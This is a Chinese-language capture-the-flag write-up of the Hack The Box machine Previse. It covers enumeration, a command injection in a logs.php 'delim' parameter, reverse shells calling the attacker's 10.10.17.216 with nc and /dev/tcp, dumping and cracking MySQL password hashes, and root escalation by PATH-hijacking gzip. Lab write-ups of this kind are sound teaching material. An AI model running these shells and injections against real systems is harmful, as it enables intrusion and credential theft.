Lluna's Pure land.

What is life like when singing to wine?

0%

HTB-Previse

发表于 更新于 分类于 阅读次数: Valine:
本文字数: 11k 阅读时长 ≈ 10 分钟

0x00.简述

0x01.信息搜集

可以看到只开放了22与80端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(root💀kali)-[~/htb/Previse]
└─# nmap -sC -sV -sT 10.10.11.104 -oN nmap.CVT
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-15 08:54 EDT
Nmap scan report for 10.10.11.104
Host is up (0.60s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
|   256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_  256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.49 seconds

0x02.访问80端口

只有一个登入框。尝试弱口令无果

0x03.扫目录

其他都需要登入后才可以访问,只有nav.php可以访问

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(root💀kali)-[~/htb/Previse]
└─# gobuster dir -u http://10.10.11.104 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -t 50 -x php     
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.11.104
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/08/15 23:38:09 Starting gobuster in directory enumeration mode
===============================================================
/nav.php              (Status: 200) [Size: 1248]
/footer.php           (Status: 200) [Size: 217] 
/index.php            (Status: 302) [Size: 2801] [--> login.php]
/download.php         (Status: 302) [Size: 0] [--> login.php]   
/header.php           (Status: 200) [Size: 980]                 
/files.php            (Status: 302) [Size: 4914] [--> login.php]
/login.php            (Status: 200) [Size: 2224]                
/config.php           (Status: 200) [Size: 0]                   
/accounts.php         (Status: 302) [Size: 3994] [--> login.php]
/status.php           (Status: 302) [Size: 2968] [--> login.php]
/css                  (Status: 301) [Size: 310] [--> http://10.10.11.104/css/]
/js                   (Status: 301) [Size: 309] [--> http://10.10.11.104/js/] 
/logout.php           (Status: 302) [Size: 0] [--> login.php]                 
/logs.php             (Status: 302) [Size: 0] [--> login.php]                 
                                                                              
===============================================================
2021/08/16 00:12:43 Finished
===============================================================

0x04.访问nav.php

可以看到创建用户链接,但是都重定向了

burp抓包,修改响应码

修改为200放过

可以看到可以创建用户了

0x05.登入

创建admin用户后登入

在flies标签下可以上传文件,但不能利用。并有网站备份文件且可以下载,那就下载下来

查看backup,其中config.php与logs.php有用,审计代码,发现delim参数处存在命令注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
config.php
得到数据用户与密码

<?php

function connectDB(){
    $host = 'localhost';
    $user = 'root';
    $passwd = 'mySQL_p@ssw0rd!:)';
    $db = 'previse';
    $mycon = new mysqli($host, $user, $passwd, $db);
    return $mycon;
}

?>

logs.php
日志输出系统为python写的(/opt/scripts/log_process.py)

<?php
session_start();
if (!isset($_SESSION['user'])) {
    header('Location: login.php');
    exit;
}
?>

<?php
if (!$_SERVER['REQUEST_METHOD'] == 'POST') {
    header('Location: login.php');
    exit;
}

/////////////////////////////////////////////////////////////////////////////////////
//I tried really hard to parse the log delims in PHP, but python was SO MUCH EASIER//
/////////////////////////////////////////////////////////////////////////////////////

$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;

$filepath = "/var/www/out.log";
$filename = "out.log";    

if(file_exists($filepath)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'.basename($filepath).'"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($filepath));
    ob_clean(); // Discard data in the output buffer
    flush(); // Flush system headers
    readfile($filepath);
    die();
} else {
    http_response_code(404);
    die();
} 
?>

0x06.漏洞验证

kali监听6666端口

1
2
3
4
5
┌──(root💀kali)-[~]
└─# nc -nvlp 6666                                                                                                               1 ⨯
listening on [any] 6666 ...


curl探测

kali回显

1
2
3
4
5
6
7
8
9
10
11
┌──(root💀kali)-[~]
└─# nc -nvlp 6666                                                                                                               1 ⨯
listening on [any] 6666 ...
connect to [10.10.17.216] from (UNKNOWN) [10.10.11.104] 35806
GET / HTTP/1.1
Host: 10.10.17.216:6666
User-Agent: curl/7.58.0
Accept: */*



0x07.反弹shell

kali继续监听\

1
2
3
4
5
┌──(root💀kali)-[~]
└─# nc -nvlp 6666                                                                                                               1 ⨯
listening on [any] 6666 ...


nc反弹shell

1
nc -e /bin/sh 10.10.17.216 6666

kali接到shell,得到的shell非交互,不能登入mysql

1
2
3
4
5
6
7
8
┌──(root💀kali)-[~]
└─# nc -nvlp 6666                                                                                                               1 ⨯
listening on [any] 6666 ...
connect to [10.10.17.216] from (UNKNOWN) [10.10.11.104] 35844
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)


升级交互shell

1
2
3
4
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@previse:/var/www/html$ 

www-data@previse:/var/www/html$

0x08.登入mysql

获取m4lwhere密码md5值

$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
www-data@previse:/var/www/html$ mysql -uroot -p
mysql -uroot -p
Enter password: mySQL_p@ssw0rd!:)

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 5810
Server version: 5.7.35-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2021, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| previse            |
| sys                |
+--------------------+
5 rows in set (0.00 sec)

mysql> use previse;
use previse;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-------------------+
| Tables_in_previse |
+-------------------+
| accounts          |
| files             |
+-------------------+
2 rows in set (0.00 sec)

mysql> desc accounts;
desc accounts;
+------------+--------------+------+-----+-------------------+----------------+
| Field      | Type         | Null | Key | Default           | Extra          |
+------------+--------------+------+-----+-------------------+----------------+
| id         | int(11)      | NO   | PRI | NULL              | auto_increment |
| username   | varchar(50)  | NO   | UNI | NULL              |                |
| password   | varchar(255) | NO   |     | NULL              |                |
| created_at | datetime     | YES  |     | CURRENT_TIMESTAMP |                |
+------------+--------------+------+-----+-------------------+----------------+
4 rows in set (0.00 sec)

mysql> select * from accounts;
select * from accounts;
+----+----------+------------------------------------+---------------------+
| id | username | password                           | created_at          |
+----+----------+------------------------------------+---------------------+
|  1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 |
|  2 | admin    | $1$🧂llol$uXqzPW6SXUONt.AIOBqLy. | 2021-08-16 09:11:44 |
|  3 | simon    | $1$🧂llol$XiMVTMY58ITU/9mYPenku0 | 2021-08-16 09:13:39 |
|  4 | newguy   | $1$🧂llol$wzYjWk/p5usz8BzxvPrXs1 | 2021-08-16 10:42:19 |
|  5 | jonny    | $1$🧂llol$wzYjWk/p5usz8BzxvPrXs1 | 2021-08-16 10:44:39 |
+----+----------+------------------------------------+---------------------+
5 rows in set (0.00 sec)

mysql>

john破解hash值

ilovecody112235!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root💀kali)-[~/htb/Previse]
└─# john -format=md5crypt-long --wordlist=/usr/share/wordlists/rockyou.txt userhash 
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt-long, crypt(3) $1$ (and variants) [MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ilovecody112235! (?)
1g 0:00:05:50 DONE (2021-08-16 07:03) 0.002855g/s 21171p/s 21171c/s 21171C/s ilovecodydean..ilovecody..
Use the "--show" option to display all of the cracked passwords reliably
Session completed
                                                                                                                                    
┌──(root💀kali)-[~/htb/Previse]
└─# cat userhash   
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.
                                                                                                                                    
┌──(root💀kali)-[~/htb/Previse]
└─#

0x09.ssh登入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(root💀kali)-[~/htb/Previse]
└─# ssh m4lwhere@10.10.11.104
m4lwhere@10.10.11.104's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Aug 16 11:15:27 UTC 2021

  System load:  0.1               Processes:           241
  Usage of /:   49.4% of 4.85GB   Users logged in:     0
  Memory usage: 26%               IP address for eth0: 10.10.11.104
  Swap usage:   0%


0 updates can be applied immediately.


Last login: Fri Jun 18 01:09:10 2021 from 10.10.10.5
m4lwhere@previse:~$ pwd
/home/m4lwhere
m4lwhere@previse:~$ ls
user.txt
m4lwhere@previse:~$ cat user.txt 
********************************
m4lwhere@previse:~$

0x10.提权

sudo -l提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(root💀kali)-[~/htb/Previse]
└─# ssh m4lwhere@10.10.11.104
m4lwhere@10.10.11.104's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Aug 16 12:06:54 UTC 2021

  System load:  0.0               Processes:           174
  Usage of /:   49.4% of 4.85GB   Users logged in:     0
  Memory usage: 20%               IP address for eth0: 10.10.11.104
  Swap usage:   0%


0 updates can be applied immediately.


Last login: Fri Jun 18 01:09:10 2021 from 10.10.10.5
m4lwhere@previse:~$ sudo -l
[sudo] password for m4lwhere: 
User m4lwhere may run the following commands on previse:
    (root) /opt/scripts/access_backup.sh
m4lwhere@previse:~$

查看/opt/scripts/access_backup.sh

1
2
3
4
5
6
7
8
9
10
11
12
m4lwhere@previse:~$ cat /opt/scripts/access_backup.sh
#!/bin/bash

# We always make sure to store logs, we take security SERIOUSLY here

# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time

gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz
m4lwhere@previse:~$

利用gzip路径滥用构建payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
m4lwhere@previse:~$ cd /tmp
m4lwhere@previse:/tmp$ ls
systemd-private-d085308c77194968bd2248c5047e9e7d-apache2.service-SHI4Vf
systemd-private-d085308c77194968bd2248c5047e9e7d-systemd-resolved.service-c4hkjA
systemd-private-d085308c77194968bd2248c5047e9e7d-systemd-timesyncd.service-oovQQq
vmware-root_904-2697008433
m4lwhere@previse:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
m4lwhere@previse:/tmp$ vim gzip
m4lwhere@previse:/tmp$ cat gzip
#!/bin/bash
bash -i >& /dev/tcp/10.10.17.216/8888 0>&1
m4lwhere@previse:/tmp$ chmod +x gzip 
m4lwhere@previse:/tmp$ export PATH=/tmp:$PATH
m4lwhere@previse:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
m4lwhere@previse:/tmp$ sudo /opt/scripts/access_backup.sh


反弹shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(root💀kali)-[~]
└─# nc -nvlp 8888
listening on [any] 8888 ...
connect to [10.10.17.216] from (UNKNOWN) [10.10.11.104] 51322
root@previse:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)
root@previse:/tmp# whoami
whoami
root
root@previse:~# cd /root
cd /root
root@previse:/root# ls
ls
root.txt
root@previse:/root# cat root.txt
cat root.txt
************************
root@previse:/root#


-------------纸短情长下次再见-------------